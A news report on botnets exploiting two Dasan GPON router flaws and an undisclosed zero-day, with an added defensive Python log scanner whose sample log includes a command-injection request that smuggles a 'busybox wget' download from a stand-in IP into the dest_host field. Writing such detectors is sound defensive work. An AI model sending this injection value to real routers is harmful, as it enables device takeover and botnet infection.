Attacks on Dasan GPON routers exploiting two vulnerabilities disclosed last month are continuing, but today researchers from Qihoo 360 Netlab revealed that one botnet operator appears to have deployed a new zero-day affecting the same router models.
The security firm has declined to release further details on this flaw, to avoid enabling more attacks, but said it was able to reproduce its effects.
"We tested this payload on two different versions of [Dasan] GPON home router," the Netlab team said, "all work."
The botnet exploiting this new GPON router zero-day is called TheMoon, a very old threat that was first spotted in 2014 infecting Linux servers but has shifted toward home routers and IoT devices in recent years.
TheMoon is only the latest botnet to add support for exploiting Dasan GPON routers. Five others, Hajime, Mettle, Mirai, Muhstik, and Satori, have been exploiting two older vulnerabilities for almost a week.
The two vulnerabilities these five botnets were targeting are CVE-2018-10561 and CVE-2018-10562.
Chained together, these two vulnerabilities allow attackers to take over affected devices: GPON routers made by South Korean vendor Dasan. GPON stands for Gigabit Passive Optical Network, a telecommunications technology for delivering internet connections over fiber-optic lines.
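For operators who want to check whether their own GPON routers are being probed, the following is an added example of a simple log scanner; it is not code from the article or from Netlab. The request patterns it looks for come from the public advisories for the two CVEs (CVE-2018-10561: appending `?images/` to a management URL such as `/GponForm/diag_Form` bypasses authentication; CVE-2018-10562: the diagnostic form's `dest_host` parameter is passed to a shell unsanitized), not from this article. The log line format (`client_ip METHOD path body`, with POST bodies captured by a reverse proxy or WAF) and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Indicators assumed from the public advisories, not from this article:
# CVE-2018-10561 auth bypass = a "?images/" suffix on a /GponForm/ management URL,
# CVE-2018-10562 command injection = shell metacharacters in the diag form's dest_host.
GPON_FORM_RE = re.compile(r"/GponForm/", re.IGNORECASE)
BYPASS_SUFFIX_RE = re.compile(r"\?images/", re.IGNORECASE)
SHELL_META_RE = re.compile(r"[`;|&$]")  # a ping target never legitimately needs these

# Assumed log format: "<client_ip> <METHOD> <path_with_query> <body or ->".
LOG_RE = re.compile(r"^(\S+)\s+(GET|POST)\s+(\S+)\s+(.*)$")

# Constructed sample log: two malicious requests from one client, two benign ones.
SAMPLE_LOG = """\
203.0.113.7 GET /GponForm/diag_Form?images/ -
203.0.113.7 POST /GponForm/diag_Form?images/ XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://198.51.100.5/x`;&ipv=0
192.0.2.44 POST /GponForm/diag_Form XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=8.8.8.8&ipv=0
192.0.2.44 GET /images/logo.png -
"""


def classify(line):
    """Return (client_ip, [findings]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, body = m.groups()
    findings = []

    # Auth-bypass pattern: management form URL carrying the "?images/" suffix.
    if GPON_FORM_RE.search(target) and BYPASS_SUFFIX_RE.search(target):
        findings.append("CVE-2018-10561 auth-bypass pattern")

    # Command-injection pattern: POST to the diagnostic form whose dest_host
    # carries shell metacharacters (a hostname or IP never needs them).
    if method == "POST" and "diag_Form" in target and body != "-":
        params = parse_qs(body, keep_blank_values=True)
        if any(SHELL_META_RE.search(v) for v in params.get("dest_host", [])):
            findings.append("CVE-2018-10562 command-injection pattern")

    return ip, findings


def scan(log_text):
    """Return [(client_ip, findings)] for every line that matched at least one pattern."""
    hits = []
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[1]:
            hits.append(result)
    return hits


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, "->", "; ".join(findings))
```

Matching on the bypass suffix alone is deliberately loose: a GET with `?images/` against any management form is reconnaissance worth alerting on even when no payload follows, and the two constructed benign lines show that ordinary `/images/` static requests and a normal ping diagnostic do not trigger it.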
Initially, it was believed the number of exposed devices was over one million, but the device maker later officially stated that the number of devices vulnerable to CVE-2018-10561 and CVE-2018-10562 was only 240,000.
The good news is that, in spite of the large number of vulnerable devices, the five botnets that went after these routers last week largely failed, because the exploit packages they were using did not infect devices reliably.
Netlab says these five botnets managed to infect only around 2% of the entire pool of vulnerable GPON routers.
This might change in the coming days, both because of the new zero-day deployed by the TheMoon botnet and because botnet operators have been improving their exploit payloads over the past few days.
Nonetheless, Netlab says that, together with partners in the security industry, it has scored a victory for the good guys by taking down the servers of the Muhstik botnet, one of the five botnets that were targeting GPON routers last week.
However, the victory may be short-lived, as Muhstik's operators appear to be attempting to set up new servers and resume their router-hacking activities.